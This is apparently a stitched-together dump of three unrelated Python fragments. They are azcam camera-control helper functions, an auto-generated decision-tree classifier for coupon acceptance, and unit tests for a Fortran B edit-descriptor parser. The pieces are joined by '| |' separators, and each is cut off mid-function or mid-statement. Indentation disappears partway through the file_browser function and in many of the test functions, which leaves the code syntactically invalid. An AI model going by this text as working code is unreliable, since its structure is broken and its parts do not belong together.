                subfolder = azcam.utils.fix_path(os.path.join(root, name))
                if subfolder not in sys.path:
                    sys.path.append(subfolder)
    return
def make_image_filename(imagefile: str) -> str:
    """
    Returns the absolute file imagefile, with forward slashes.

    Appends ".fits" unless the name already ends in a recognized image
    extension (".fits", ".fit", or ".bin").

    Args:
        imagefile: image filename to be expanded
    Returns:
        expanded image filename.
    """
    # str.endswith accepts a tuple of suffixes - one check instead of a chain
    if not imagefile.endswith((".fits", ".fit", ".bin")):
        imagefile += ".fits"
    return fix_path(imagefile)
def parse(string: str, set_type=0) -> list[str]:
    """
    Parse a string into tokens using the standard azcam rules.

    If set_type is true, try and set the data type for each token.

    Args:
        string: String to be parsed into tokens
        set_type: True to try and set the type of each token ("1" to 1)
    Returns:
        list of parsed tokens
    """
    # shlex handles quoting and comments
    lexer = shlex.shlex(string)
    lexer.quotes = "\"'"
    lexer.whitespace_split = True
    lexer.commenters = "#"

    tokens = []
    for token in lexer:
        # Remove bounding quotes unless they quote a number, in which
        # case the quotes force the token to remain a string.
        for quote in ('"', "'"):
            if token.startswith(quote) and token.endswith(quote):
                unquoted = token[1:-1]
                datatype, _ = get_datatype(unquoted)
                if datatype not in ["int", "float"]:
                    token = unquoted
                break
        tokens.append(token)

    if set_type:
        tokens = [get_datatype(token)[1] for token in tokens]

    return tokens
def get_datatype(value) -> list:
    """
    Determine the data type for an object and set the type if possible.

    A string such as "1.23" will result in a type "float" and "2" will
    result in type "int"; anything else is reported as type "str".

    Args:
        value: object to be typed
    Returns:
        list [type, value] of data type as a code and object with that type
    """
    # exact type checks (not isinstance) so e.g. bool stays "str"
    if type(value) is str:
        if value.isdigit():
            # string of digits -> integer
            return ["int", int(value)]
        try:
            # anything float() accepts (including negatives) -> float
            return ["float", float(value)]
        except ValueError:
            return ["str", value]

    if type(value) is int:
        return ["int", int(value)]

    if type(value) is float:
        return ["float", float(value)]

    # more work here
    return ["str", value]
def prompt(prompt_message: str = "Enter a string", default: str = "") -> str:
    """
    Prints a message and waits for user input.

    Args:
        prompt_message: string to be printed
        default: string to be returned if no value is entered
    Returns:
        string entered, the default value, or "" on Ctrl-C
    """
    default = str(default)
    # show the default inside brackets when one is provided
    suffix = " [" + default + "]: " if default != "" else ": "
    try:
        entry = input(prompt_message + suffix)
    except KeyboardInterrupt:
        return ""
    return entry if entry != "" else default
def check_keyboard(wait: bool = False) -> str:
    """
    Checks keyboard for a key press.

    For Windows OS only (uses msvcrt).

    Args:
        wait: True to wait until a key is pressed
    Returns:
        key which was pressed or empty string.
    Raises:
        azcam.AzcamError: when not running on Windows ("nt").
    """
    # TODO: map sequences like 'F1'
    if os.name != "nt":
        raise azcam.AzcamError("check_keyboard not supported on this OS")

    loop = 1
    key = ""
    while loop:
        if msvcrt.kbhit():
            # a key is available; read it without echoing
            key = msvcrt.getch()
            try:
                key = key.decode()
                # since the key is byte type, maybe escape sequence so check for more
                # if msvcrt.kbhit():
                #     key1 = msvcrt.getch()
                #     # key = key + key1.decode()
            except UnicodeDecodeError:
                # non-decodable byte (e.g. special-key prefix); returned as-is
                pass
            break
        if not wait:
            # polling mode: give up after one check
            loop = 0
    return key
def show_menu(configs: dict) -> str:
    """
    Interactive: Show a menu and wait for selection.

    The key "blank" may be used to display an empty line.
    print() is allowed here as this is for interactive use only.

    Args:
        configs: Dictionary of strings which are menu items
    Returns:
        string associated with item selected or empty string.
    """
    if len(configs) == 1:
        return configs[list(configs.keys())[0]]

    # Selectable keys in display order, excluding "blank" spacer entries.
    # BUGFIX: the old code called configs.remove("blank") on a dict
    # (AttributeError) while iterating it; filter into a list instead.
    items = [key for key in configs if key != "blank"]

    choice = ""
    confirmed = False
    while not confirmed:
        print("Select configuration number from list below:\n")
        number = 0
        for key in configs:
            if key == "blank":
                print("")
            else:
                number += 1
                print("%1d.....%s" % (number, key))
        print("")
        print("Enter configuration number: ", end="")

        choiceindex = input()
        if choiceindex == "q":
            azcam.AzcamWarning("Quit detected")
            return

        try:
            choiceindex = int(choiceindex) - 1  # zero based
        except ValueError:
            print("Bad keyboard input...try again\n")
            continue

        if choiceindex < 0 or choiceindex > len(items) - 1:
            print("invalid selection - %d\n" % (choiceindex + 1))
            continue

        choice = configs[items[choiceindex]]
        confirmed = True

    print("")
    return choice
def get_image_roi() -> list:
    """
    Get the data and noise regions of interest in image coordinates.

    Check for ROI's in the following order:

    - azcam.db.imageroi if defined
    - display.roi if defined

    Returns:
        list of ROIs
    Raises:
        azcam.AzcamError: if no display tool is available.
    """
    # prefer the database roi when it exists and is non-empty
    if azcam.db.get("imageroi") and azcam.db.imageroi != []:
        return azcam.db.imageroi

    # fall back to the display tool's ROIs
    try:
        data_roi = azcam.db.display.get_rois(0, "image")
    except AttributeError:
        raise azcam.AzcamError("cannot get ROI - display not found")

    rois = [data_roi]
    noise_roi = azcam.db.display.get_rois(1, "image")
    # reuse the data ROI when no separate noise ROI is defined
    rois.append(noise_roi if noise_roi else data_roi)
    return rois
def set_image_roi(roi: "list | None" = None) -> None:
    """
    Set the global image region of interest "db.imageroi".

    If roi is not specified (None or empty), use the display ROI.

    Args:
        roi: ROI list, or None/[] to read the ROI from the display
    Raises:
        azcam.AzcamError: if no display tool is found or it has no ROI.
    """
    # set directly with given value
    # (None sentinel replaces the old mutable-default argument roi=[])
    if roi:
        azcam.db.imageroi = roi
        return

    # use display ROIs
    try:
        reply = azcam.db.display.get_rois(-1, "image")
    except AttributeError:
        raise azcam.AzcamError("cannot set ROI - no display found")
    if not reply:
        raise azcam.AzcamError("could not get display ROI")

    azcam.db.imageroi = reply
    return
def file_browser(Path: str = "", SelectString: str = "*.*", Label: str = "") -> list:
"""
Filebrowser GUI to select files. This is the tcl/tk version.
Args:
Path: Starting path for selection.
SelectString: Selection string like [('all files',('*.*'))] for filtering file names or *folder* to select folders.
Label: Dialog box label.
Returns:
list of selected files/folders or None
"""
tkinter.Tk().withdraw() # we don't want a full GUI, so keep the root window from appearing
options = {}
if Path != "":
options["initialdir"] = Path if os.path.isdir(Path) else os.path.dirname(Path)
else:
options["initialdir"] = ""
if SelectString == "folder":
options["mustexist"] = True
options["title"] = "Select folder" if Label == "" else Label
folder = tkinter.filedialog.askdirectory(**options)
if folder is None:
return
if folder == "":
folder = None
return folder
else:
options["title"] = "Select file(s)" if Label == "" else Label
options["multiple"] = True
# get filetypes string
if SelectString == "*.*":
options["filetypes"] = [("all files", "*.*")]
| |
"metric_value": 0.0, "depth": 11}
if obj[10]<=0:
return 'True'
elif obj[10]>0:
return 'False'
else: return 'False'
elif obj[4]<=3:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.0, "depth": 11}
if obj[10]>0:
return 'True'
elif obj[10]<=0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[1]>2:
return 'False'
else: return 'False'
else: return 'True'
else: return 'False'
else: return 'False'
elif obj[6]<=1.348010951701891:
# {"feature": "Coffeehouse", "instances": 82, "metric_value": 0.2475, "depth": 6}
if obj[8]<=2.0:
# {"feature": "Restaurant20to50", "instances": 74, "metric_value": 0.194, "depth": 7}
if obj[9]<=1.0:
# {"feature": "Age", "instances": 67, "metric_value": 0.1562, "depth": 8}
if obj[4]>1:
# {"feature": "Time", "instances": 47, "metric_value": 0.2197, "depth": 9}
if obj[1]<=3:
# {"feature": "Direction_same", "instances": 43, "metric_value": 0.2377, "depth": 10}
if obj[10]<=0:
# {"feature": "Gender", "instances": 31, "metric_value": 0.2615, "depth": 11}
if obj[3]>0:
# {"feature": "Distance", "instances": 24, "metric_value": 0.2, "depth": 12}
if obj[11]<=2:
return 'False'
elif obj[11]>2:
return 'False'
else: return 'False'
elif obj[3]<=0:
# {"feature": "Distance", "instances": 7, "metric_value": 0.4048, "depth": 12}
if obj[11]>1:
return 'False'
elif obj[11]<=1:
return 'False'
else: return 'False'
else: return 'False'
elif obj[10]>0:
# {"feature": "Distance", "instances": 12, "metric_value": 0.1333, "depth": 11}
if obj[11]<=1:
return 'False'
elif obj[11]>1:
# {"feature": "Gender", "instances": 5, "metric_value": 0.3, "depth": 12}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[1]>3:
return 'False'
else: return 'False'
elif obj[4]<=1:
return 'False'
else: return 'False'
elif obj[9]>1.0:
# {"feature": "Gender", "instances": 7, "metric_value": 0.0, "depth": 8}
if obj[3]>0:
return 'True'
elif obj[3]<=0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[8]>2.0:
# {"feature": "Time", "instances": 8, "metric_value": 0.1667, "depth": 7}
if obj[1]<=1:
return 'True'
elif obj[1]>1:
# {"feature": "Gender", "instances": 3, "metric_value": 0.0, "depth": 8}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
return 'True'
else: return 'True'
else: return 'False'
else: return 'True'
else: return 'False'
else: return 'False'
elif obj[0]>2:
# {"feature": "Age", "instances": 219, "metric_value": 0.4854, "depth": 4}
if obj[4]>2:
# {"feature": "Restaurant20to50", "instances": 123, "metric_value": 0.4675, "depth": 5}
if obj[9]<=1.0:
# {"feature": "Occupation", "instances": 86, "metric_value": 0.4791, "depth": 6}
if obj[6]>0:
# {"feature": "Education", "instances": 83, "metric_value": 0.4877, "depth": 7}
if obj[5]<=2:
# {"feature": "Time", "instances": 64, "metric_value": 0.4763, "depth": 8}
if obj[1]>0:
# {"feature": "Distance", "instances": 62, "metric_value": 0.486, "depth": 9}
if obj[11]>1:
# {"feature": "Coffeehouse", "instances": 49, "metric_value": 0.4694, "depth": 10}
if obj[8]>0.0:
# {"feature": "Gender", "instances": 27, "metric_value": 0.4242, "depth": 11}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 16, "metric_value": 0.375, "depth": 12}
if obj[10]<=0:
return 'False'
else: return 'False'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 11, "metric_value": 0.4959, "depth": 12}
if obj[10]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[8]<=0.0:
# {"feature": "Gender", "instances": 22, "metric_value": 0.381, "depth": 11}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 15, "metric_value": 0.4444, "depth": 12}
if obj[10]<=0:
return 'False'
else: return 'False'
elif obj[3]>0:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.2449, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
elif obj[11]<=1:
# {"feature": "Coffeehouse", "instances": 13, "metric_value": 0.3916, "depth": 10}
if obj[8]<=2.0:
# {"feature": "Gender", "instances": 11, "metric_value": 0.4416, "depth": 11}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.4082, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.5, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[8]>2.0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[1]<=0:
return 'False'
else: return 'False'
elif obj[5]>2:
# {"feature": "Time", "instances": 19, "metric_value": 0.4087, "depth": 8}
if obj[1]<=3:
# {"feature": "Coffeehouse", "instances": 17, "metric_value": 0.3494, "depth": 9}
if obj[8]<=2.0:
# {"feature": "Gender", "instances": 11, "metric_value": 0.2803, "depth": 10}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 8, "metric_value": 0.2188, "depth": 11}
if obj[10]<=0:
# {"feature": "Distance", "instances": 8, "metric_value": 0.2188, "depth": 12}
if obj[11]<=2:
return 'True'
else: return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 11}
if obj[10]<=0:
# {"feature": "Distance", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[11]<=2:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[8]>2.0:
# {"feature": "Gender", "instances": 6, "metric_value": 0.4, "depth": 10}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.48, "depth": 11}
if obj[10]<=0:
# {"feature": "Distance", "instances": 5, "metric_value": 0.48, "depth": 12}
if obj[11]<=2:
return 'False'
else: return 'False'
else: return 'False'
elif obj[3]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[1]>3:
return 'False'
else: return 'False'
else: return 'True'
elif obj[6]<=0:
return 'True'
else: return 'True'
elif obj[9]>1.0:
# {"feature": "Education", "instances": 37, "metric_value": 0.3326, "depth": 6}
if obj[5]>0:
# {"feature": "Coffeehouse", "instances": 26, "metric_value": 0.4431, "depth": 7}
if obj[8]>-1.0:
# {"feature": "Time", "instances": 25, "metric_value": 0.4383, "depth": 8}
if obj[1]<=3:
# {"feature": "Occupation", "instances": 23, "metric_value": 0.456, "depth": 9}
if obj[6]<=9:
# {"feature": "Gender", "instances": 18, "metric_value": 0.4938, "depth": 10}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 9, "metric_value": 0.4938, "depth": 11}
if obj[10]<=0:
# {"feature": "Distance", "instances": 9, "metric_value": 0.4938, "depth": 12}
if obj[11]<=2:
return 'True'
else: return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 9, "metric_value": 0.4938, "depth": 11}
if obj[10]<=0:
# {"feature": "Distance", "instances": 9, "metric_value": 0.4938, "depth": 12}
if obj[11]<=2:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[6]>9:
# {"feature": "Gender", "instances": 5, "metric_value": 0.2667, "depth": 10}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 11}
if obj[10]<=0:
# {"feature": "Distance", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[11]<=2:
return 'True'
else: return 'True'
else: return 'True'
elif obj[3]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[1]>3:
return 'True'
else: return 'True'
elif obj[8]<=-1.0:
return 'False'
else: return 'False'
elif obj[5]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[4]<=2:
# {"feature": "Education", "instances": 96, "metric_value": 0.4495, "depth": 5}
if obj[5]<=2:
# {"feature": "Restaurant20to50", "instances": 76, "metric_value": 0.4171, "depth": 6}
if obj[9]>-1.0:
# {"feature": "Time", "instances": 74, "metric_value": 0.4109, "depth": 7}
if obj[1]>2:
# {"feature": "Coffeehouse", "instances": 52, "metric_value": 0.3537, "depth": 8}
if obj[8]<=3.0:
# {"feature": "Occupation", "instances": 49, "metric_value": 0.3231, "depth": 9}
if obj[6]<=21:
# {"feature": "Gender", "instances": 48, "metric_value": 0.3241, "depth": 10}
if obj[3]>0:
# {"feature": "Distance", "instances": 30, "metric_value": 0.2716, "depth": 11}
if obj[11]>1:
# {"feature": "Direction_same", "instances": 27, "metric_value": 0.3018, "depth": 12}
if obj[10]<=0:
return 'False'
else: return 'False'
elif obj[11]<=1:
return 'False'
else: return 'False'
elif obj[3]<=0:
# {"feature": "Distance", "instances": 18, "metric_value": 0.4, "depth": 11}
if obj[11]>1:
# {"feature": "Direction_same", "instances": 15, "metric_value": 0.3911, "depth": 12}
if obj[10]<=0:
return 'False'
else: return 'False'
elif obj[11]<=1:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[10]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[6]>21:
return 'True'
else: return 'True'
elif obj[8]>3.0:
# {"feature": "Gender", "instances": 3, "metric_value": 0.0, "depth": 9}
if obj[3]<=0:
return 'True'
elif obj[3]>0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[1]<=2:
# {"feature": "Coffeehouse", "instances": 22, "metric_value": 0.4306, "depth": 8}
if obj[8]<=2.0:
# {"feature": "Occupation", "instances": 19, "metric_value": 0.4451, "depth": 9}
if obj[6]<=12:
# {"feature": "Gender", "instances": 14, "metric_value": 0.4898, "depth": 10}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.4898, "depth": 11}
if obj[10]<=0:
# {"feature": "Distance", "instances": 7, "metric_value": 0.4898, "depth": 12}
if obj[11]<=2:
return 'False'
else: return 'False'
else: return 'False'
elif obj[3]>0:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.4898, "depth": 11}
if obj[10]<=0:
# {"feature": "Distance", "instances": 7, "metric_value": 0.4898, "depth": 12}
if obj[11]<=2:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[6]>12:
# {"feature": "Gender", "instances": 5, "metric_value": 0.2667, "depth": 10}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 11}
if obj[10]<=0:
# {"feature": "Distance", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[11]<=2:
return 'True'
else: return 'True'
else: return 'True'
elif obj[3]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[8]>2.0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[9]<=-1.0:
return 'True'
else: return 'True'
elif obj[5]>2:
# {"feature": "Coffeehouse", "instances": 20, "metric_value": 0.4, "depth": 6}
if obj[8]<=3.0:
# {"feature": "Restaurant20to50", "instances": 18, "metric_value": 0.3922, "depth": 7}
if obj[9]>-1.0:
# {"feature": "Occupation", "instances": 17, "metric_value": 0.3644, "depth": 8}
if obj[6]<=6:
# {"feature": "Time", "instances": 9, "metric_value": 0.4815, "depth": 9}
if obj[1]>2:
# {"feature": "Gender", "instances": 6, "metric_value": 0.4, "depth": 10}
if obj[3]<=0:
# {"feature": "Distance", "instances": 5, "metric_value": 0.4667, "depth": 11}
if obj[11]>1:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
elif obj[11]<=1:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[3]>0:
return 'False'
else: return 'False'
elif obj[1]<=2:
# {"feature": "Gender", "instances": 3, "metric_value": 0.3333, "depth": 10}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[10]<=0:
# {"feature": "Distance", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[11]<=2:
return 'True'
else: return 'True'
else: return 'True'
elif obj[3]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[6]>6:
# {"feature": "Time", "instances": 8, "metric_value": 0.125, "depth": 9}
if obj[1]>2:
return 'True'
elif obj[1]<=2:
# {"feature": "Gender", "instances": 2, "metric_value": 0.0, "depth": 10}
if obj[3]>0:
return 'True'
elif obj[3]<=0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[9]<=-1.0:
return 'False'
else: return 'False'
elif obj[8]>3.0:
return 'False'
else: return 'False'
else: return 'True'
else: return 'False'
else: return 'False'
elif obj[7]>1.0:
# {"feature": "Restaurant20to50", "instances": 662, "metric_value": 0.4594, "depth": 3}
if obj[9]<=1.0:
# {"feature": "Passanger", "instances": 355, "metric_value": 0.4904, "depth": 4}
if obj[0]<=2:
# {"feature": "Time", "instances": 290, "metric_value": 0.4838, "depth": 5}
if obj[1]<=2:
# {"feature": "Occupation", "instances": 202, "metric_value": 0.4801, "depth": 6}
if obj[6]<=13.60630442015693:
# {"feature": "Gender", "instances": 170, "metric_value": 0.4739, "depth": 7}
if obj[3]<=0:
# {"feature": "Coffeehouse", "instances": 102, "metric_value": 0.4471, "depth": 8}
if obj[8]>1.0:
# {"feature": "Distance", "instances": 61, "metric_value": 0.4486, "depth": 9}
if obj[11]<=2:
# {"feature": "Direction_same", "instances": 45, "metric_value": 0.4864, "depth": 10}
if obj[10]<=0:
# {"feature": "Education", "instances": 27, "metric_value": 0.4167, "depth": 11}
if obj[5]<=2:
# {"feature": "Age", "instances": 24, "metric_value": 0.4348, "depth": 12}
if obj[4]>0:
return 'False'
elif obj[4]<=0:
return 'True'
else: return 'True'
elif obj[5]>2:
return 'True'
else: return 'True'
elif obj[10]>0:
# {"feature": "Age", "instances": 18, "metric_value": 0.4314, "depth": 11}
if obj[4]>0:
# {"feature": "Education", "instances": 17, "metric_value": 0.4044, "depth": 12}
if obj[5]<=3:
return 'True'
elif obj[5]>3:
return 'False'
else: return 'False'
elif obj[4]<=0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[11]>2:
# {"feature": "Age", "instances": 16, "metric_value": 0.2768, "depth": 10}
if obj[4]<=4:
# {"feature": "Education", "instances": 14, "metric_value": 0.2286, "depth": 11}
if obj[5]>0:
# {"feature": "Direction_same", "instances": 10, "metric_value": 0.32, "depth": 12}
if obj[10]<=0:
return 'True'
else: return 'True'
elif obj[5]<=0:
return 'True'
else: return | |
inp = '''-10000'''
fmt = '''(B10.5)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_898(self):
    """Read '100000' with edit descriptor (B10.5); expect [32]."""
    fmt = '''(B10.5)'''
    inp = '''100000'''
    expected = [32]
    eds, rev_eds = _parser(_lexer(fmt))
    self.assertEqual(expected, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_899(self):
    """Reading '-100000' with (B10.5) must raise ValueError (expected: ERR)."""
    inp = '''-100000'''
    fmt = '''(B10.5)'''
    # removed unused `result` placeholder; the expectation is the raise below
    eds, rev_eds = _parser(_lexer(fmt))
    self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_900(self):
    """Read a blank-embedded binary string with (B10.5); expect [66]."""
    fmt = '''(B10.5)'''
    inp = '''10 0 00 10 0 0 1'''
    expected = [66]
    eds, rev_eds = _parser(_lexer(fmt))
    self.assertEqual(expected, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_901(self):
    """Read '10101000' with edit descriptor (B10.5); expect [168]."""
    fmt = '''(B10.5)'''
    inp = '''10101000'''
    expected = [168]
    eds, rev_eds = _parser(_lexer(fmt))
    self.assertEqual(expected, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_902(self):
    """Read '0' with edit descriptor (1B1); expect [0]."""
    fmt = '''(1B1)'''
    inp = '''0'''
    expected = [0]
    eds, rev_eds = _parser(_lexer(fmt))
    self.assertEqual(expected, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_903(self):
    """Reading '-0' with (1B1) must raise ValueError (expected: ERR)."""
    inp = '''-0'''
    fmt = '''(1B1)'''
    # removed unused `result` placeholder; the expectation is the raise below
    eds, rev_eds = _parser(_lexer(fmt))
    self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_904(self):
    """Read '1' with edit descriptor (1B1); expect [1]."""
    fmt = '''(1B1)'''
    inp = '''1'''
    expected = [1]
    eds, rev_eds = _parser(_lexer(fmt))
    self.assertEqual(expected, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_905(self):
    """Reading '-1' with (1B1) must raise ValueError (expected: ERR)."""
    inp = '''-1'''
    fmt = '''(1B1)'''
    # removed unused `result` placeholder; the expectation is the raise below
    eds, rev_eds = _parser(_lexer(fmt))
    self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_906(self):
    """Reading '2' with (1B1) must raise ValueError (expected: ERR)."""
    inp = '''2'''
    fmt = '''(1B1)'''
    # removed unused `result` placeholder; the expectation is the raise below
    eds, rev_eds = _parser(_lexer(fmt))
    self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_907(self):
inp = '''10'''
fmt = '''(1B1)'''
result = [1]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_908(self):
inp = '''-10'''
fmt = '''(1B1)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_909(self):
inp = '''100'''
fmt = '''(1B1)'''
result = [1]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_910(self):
inp = '''-100'''
fmt = '''(1B1)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_911(self):
inp = '''1000'''
fmt = '''(1B1)'''
result = [1]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_912(self):
inp = '''-1000'''
fmt = '''(1B1)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_913(self):
inp = '''10000'''
fmt = '''(1B1)'''
result = [1]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_914(self):
inp = '''-10000'''
fmt = '''(1B1)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_915(self):
inp = '''100000'''
fmt = '''(1B1)'''
result = [1]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_916(self):
inp = '''-100000'''
fmt = '''(1B1)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_917(self):
inp = '''10 0 00 10 0 0 1'''
fmt = '''(1B1)'''
result = [1]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_918(self):
inp = '''10101000'''
fmt = '''(1B1)'''
result = [1]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_919(self):
inp = '''0'''
fmt = '''(1B2)'''
result = [0]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_920(self):
inp = '''-0'''
fmt = '''(1B2)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_921(self):
inp = '''1'''
fmt = '''(1B2)'''
result = [1]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_922(self):
inp = '''-1'''
fmt = '''(1B2)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_923(self):
inp = '''2'''
fmt = '''(1B2)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_924(self):
inp = '''10'''
fmt = '''(1B2)'''
result = [2]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_925(self):
inp = '''-10'''
fmt = '''(1B2)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_926(self):
inp = '''100'''
fmt = '''(1B2)'''
result = [2]
eds, rev_eds = _parser(_lexer(fmt))
self.assertEqual(result, _input(eds, rev_eds, inp))
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
def test_b_ed_input_927(self):
inp = '''-100'''
fmt = '''(1B2)'''
result = ['''ERR''']
eds, rev_eds = _parser(_lexer(fmt))
self.assertRaises(ValueError, _input, eds, rev_eds, inp)
@attr(platform='9-1_linux_intel')
@attr('input')
@attr(ed='B')
